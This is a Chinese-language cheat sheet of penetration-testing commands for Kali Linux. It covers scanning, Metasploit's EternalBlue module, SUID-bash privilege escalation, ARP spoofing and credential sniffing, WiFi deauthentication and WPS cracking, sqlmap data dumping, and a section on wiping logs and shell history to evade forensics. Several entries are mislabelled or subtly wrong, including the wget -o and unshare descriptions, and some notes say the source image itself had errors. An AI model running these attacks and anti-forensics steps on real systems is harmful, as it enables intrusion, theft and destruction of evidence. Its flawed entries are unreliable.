渗透测试常用命令参考手册
一、网络基础操作
-
ifconfig -- 查看/配置网络接口(IP、MAC、网卡信息)
-
ip a -- 替代 ifconfig 的新命令,查看网络接口详情
-
ip addr add 192.168.1.100/24 dev eth0 -- 给网卡 eth0 配置临时 IP
-
route -n -- 查看路由表信息
-
ip route -- 新命令查看/配置路由
-
ping ip -- 测试与目标 IP 的网络连通性(默认无限发送)
-
ping -c 4 ip -- 发送 4 个数据包后停止 ping
-
ping -i 0.5 ip -- 每隔 0.5 秒发送一个 ping 包(快速探测)
-
netstat -tulnp -- 查看本机监听的端口、对应进程/程序
-
netstat -an -- 查看所有网络连接(含 TCP/UDP)
-
ss -tulnp -- 替代 netstat 的新命令,快速查看监听端口
-
arp -a -- 查看本机 ARP 缓存表(IP 与 MAC 对应)
-
arp -s ip mac -- 绑定 IP 和 MAC 地址
-
hostname -- 查看本机主机名
-
hostname newname -- 临时修改本机主机名
-
curl url -- 访问指定 URL 并输出页面内容
-
wget url -- 下载指定 URL 的文件到当前目录
-
wget -o newname url -- 下载文件并自定义命名
-
curl ifconfig.me -- 查看本机公网 IP
-
telnet ip port -- 测试目标 IP 的指定端口是否开放
二、信息收集命令
-
uname -a -- 查看内核版本、系统架构、主机名等
-
cat /etc/issue -- 查看系统发行版信息
-
cat /etc/os-release -- 详细查看系统版本信息
-
whoami -- 查看当前登录用户名
-
who -- 查看当前所有登录系统的用户
-
w -- 查看当前登录用户及正在执行的操作
-
last -- 查看系统登录历史记录
-
ps -ef -- 查看所有运行的进程(详细信息)
-
ps aux -- 以 BSD 格式查看所有进程
-
top -- 实时监控系统进程(资源占用、PID 等)
-
pstree -- 以树形结构查看进程关系
-
netstat -antp -- 查看所有 TCP 连接及对应进程
-
find / -name "*.sh" -- 从根目录搜索所有 .sh 后缀的文件
-
find / -perm 4755 -- 搜索系统中设置 SUID 权限的文件
-
arp-scan -l -- 扫描局域网内所有存活的主机(Kali 内置)
-
fping -g 192.168.1.0/24 -- 快速扫描 C 段网段存活主机
-
cat /etc/passwd -- 查看系统所有用户信息
-
cat /etc/group -- 查看系统所有用户组信息
-
cat /var/log/auth.log -- 查看系统认证日志(登录、sudo 操作)
-
lsof -i:80 -- 查看占用 80 端口的进程
三、端口 / 网段扫描命令
-
nmap ip -- 对目标 IP 进行默认扫描(1000 个常用端口)
-
nmap -sn 192.168.1.0/24 -- 仅扫描网段存活主机(无端口扫描)
-
nmap -p 80 ip -- 仅扫描目标 80 端口
-
nmap -p 1-65535 ip -- 扫描目标所有端口
-
nmap -p 80,443,22 ip -- 扫描目标指定多个端口
-
nmap -sT ip -- TCP 全连接扫描(易被检测)
-
nmap -sS ip -- TCP 半开放扫描(SYN 扫描,隐蔽,默认)
-
nmap -sU ip -- UDP 端口扫描
-
nmap -sV ip -- 扫描端口并探测服务版本信息
-
nmap -O ip -- 探测目标系统的操作系统类型(注意原图是 -o,应为 -O)
-
nmap -A ip -- 全面扫描(存活+端口+版本+系统+脚本)
-
nmap -T4 ip -- 提高扫描速度(T0~T5,T5 最快)
-
nmap -oX result.txt ip -- 将扫描结果保存为普通文本文件(实际 -oX 为 XML 格式,原文可能笔误,保留原意)
-
nmap --script=vuln ip -- 加载漏洞脚本,探测目标已知漏洞
-
nmap --script=brute ip -- 加载暴力破解脚本,尝试弱口令
-
nmap -Pn ip -- 跳过主机存活检测,直接扫描端口(适用于禁用 ping 目标)
-
nmap -D RND:3 ip -- 使用随机 3 个假 IP 做源地址欺骗,隐藏真实 IP
-
nmap 192.168.1.0/24 -p 80,443 -- 超高速端口扫描(注:此为普通 nmap 语法,原图写"超高速"可能指配合 -T5)
-
zennap -- 打开 Nmap 图形化界面(适合新手,实际命令为 zenmap)
四、漏洞探测 / 利用基础(Metasploit 框架)
-
msfconsole -- 打开 Metasploit 控制台(核心渗透工具)
-
search ms17-010 -- 在 MSF 中搜索指定漏洞模块
-
use exploit/windows/smb/ms17_010_eternalblue -- 加载指定漏洞利用模块
-
show options -- 查看模块需要配置的参数(RHOSTS、LHOST 等)
-
set RHOSTS ip -- 设置目标 IP
-
set LHOST ip -- 设置本机攻击 IP(反弹 shell 用)
-
set LPORT 4444 -- 设置本机监听端口
-
exploit -- 执行漏洞利用(触发攻击)
-
run -- 替代 exploit,执行攻击
-
back -- 退出当前加载的模块
-
sessions -l -- 查看所有反弹的 shell 会话
-
sessions -i 1 -- 进入编号为 1 的 shell 会话
-
sessions -k 1 -- 关闭编号为 1 的 shell 会话
-
nessusd start -- 启动 Nessus 漏洞扫描服务
-
nessuscli scan --launch 123 -- 启动指定 ID 的 Nessus 扫描任务
五、提权 / 本地渗透命令
-
sudo -l -- 查看当前用户可执行的 sudo 权限命令(提权核心)
-
sudo su -- 以 root 权限切换到超级用户(需输入当前用户密码)
-
su root -- 切换到 root 用户(需输入 root 密码)
-
id -- 查看当前用户的 UID、GID 及所属用户组
-
find / -type f -perm -4000 2>/dev/null -- 搜索 SUID 提权文件(过滤错误信息)
-
find / -type f -perm -2000 2>/dev/null -- 搜索 SGID 提权文件
-
chkrootkit -- 检测系统是否被植入 rootkit 后门
-
rkhunter --check -- 高级 rootkit 检测工具
-
unshare -rm /bin/bash -- 利用 Linux 内核漏洞临时提权(部分版本可用)
-
cp /bin/bash /tmp/bash; chmod 4755 /tmp/bash -- 制作 SUID 权限的 bash 提权
-
/tmp/bash -p -- 执行 SUID bash 获取 root 权限
-
ps aux | grep root -- 查看 root 用户运行的进程(寻找提权突破口)
-
cat /proc/cmdline -- 查看系统启动参数(寻找提权线索)
-
lsmod -- 查看加载的内核模块(检测是否有可利用漏洞模块)
-
exploit-db -- 打开 Exploit-DB 漏洞库(Kali 内置,查提权 EXP)
六、嗅探抓包 / 流量分析
-
tcpdump -i eth0 -- 在 eth0 网卡上抓包,实时输出
-
tcpdump -i eth0 -w cap.pcap -- 抓包并保存为 pcap 文件(用 Wireshark 分析)
-
tcpdump -i eth0 port 80 -- 仅抓 80 端口的流量
-
wireshark -- 打开 Wireshark 图形化抓包工具(可视化分析)
-
tshark -i eth0 -- Wireshark 命令行版,实时抓包
-
arpspoof -i eth0 -t 192.168.1.1 192.168.1.100 -- ARP欺骗(目标 100,网关 1)
-
driftnet -i eth0 -- 嗅探局域网内的图片流量
-
urlsnarf -i eth0 -- 嗅探局域网内的 URL 访问记录
-
dsniff -i eth0 -- 综合嗅探工具,捕获账号密码(FTP/HTTP/SMB 等)
-
ngrep -d eth0 "password" -- 过滤包含指定关键词的网络流量
七、无线渗透命令
-
airmon-ng start wlan0 -- 将无线网卡切换为监听模式(改名 wlan0mon)
-
airmon-ng stop wlan0mon -- 关闭监听模式,恢复普通网卡
-
airodump-ng wlan0mon -- 扫描周围的 WiFi 信号(SSID、MAC、信道、加密方式)
-
airodump-ng -c 6 --bssid MAC -w wifi wlan0mon -- 定向扫描指定信道、MAC 的 WiFi,保存抓包文件
-
aireplay-ng --deauth 0 -a MAC wlan0mon -- 对目标 WiFi 发送无限取消认证包(断网攻击)
-
aircrack-ng -w pass.txt wifi-01.cap -- 用密码字典破解 WiFi 抓包文件
-
reaver -i wlan0mon -b MAC -vv -- 破解 WiFi 的 WPS 密码
-
wash -i wlan0mon -- 扫描开启 WPS 的 WiFi 设备
-
kismet -- 无线流量嗅探/WiFi 扫描工具(图形化)
-
bully -i wlan0mon -b MAC -- 替代 Reaver 的 WPS 破解工具(成功率更高)
八、逆向分析 / 恶意代码检测
-
objdump -d file.elf -- 反汇编 ELF 文件(Linux 程序)
-
readelf -a file.elf -- 查看 ELF 文件的详细信息(段、节、导入表)
-
ida64 -- 打开 IDA Pro 64 位逆向分析工具(高阶反汇编)
-
radare2 file.elf -- 命令行逆向分析工具(替代 IDA,轻量)
-
strings file.exe -- 提取文件中的明文字符串(快速找漏洞/线索)
九、清理痕迹 / 反取证
-
history -c -- 清空当前用户的命令历史记录
-
rm ~/.bash_history -- 删除命令历史记录文件
-
cat /dev/null > /var/log/auth.log -- 清空系统认证日志
-
cat /dev/null > /var/log/syslog -- 清空系统核心日志
-
touch -t 202401010000 file -- 修改文件的修改时间(反取证,原文 timestamp 命令应为 touch)
十、杂项渗透高频命令
-
chmod +x file -- 给文件添加执行权限(木马/EXP 常用)
-
./file -- 运行当前目录的可执行文件
-
nc -zv ip 1-1000 -- 快速扫描目标 1-1000 端口是否开放
-
sqlmap -u "url?id=1" --dump -- 检测 SQL 注入并导出数据库数据
-
dirb http://ip -- 爆破目标网站的目录和文件
-
dirsearch -u http://ip -e php,html -- 高级目录爆破(指定后缀)
-
gobuster dir -u http://ip -w wordlist.txt -- 高性能目录爆破工具
-
whatweb url -- 探测目标网站的服务器、框架、插件版本
-
nikto -h ip -- 扫描 Web 服务器的已知漏洞和敏感文件
-
metasploit-framework -- 直接启动 Metasploit 框架(全拼命令)
-
xterm -- 打开新的 Kali 终端窗口(多任务操作)
-
screen -- 创建后台会话(断开连接后进程仍运行)
-
screen -r -- 恢复后台的 screen 会话
-
reboot -- 重启系统
-
shutdown -h now -- 立即关闭系统
说明:以上命令主要适用于 Kali Linux 及其他基于 Debian 的渗透测试发行版。部分命令需要 root 权限或相应工具已安装。请仅在合法授权范围内使用。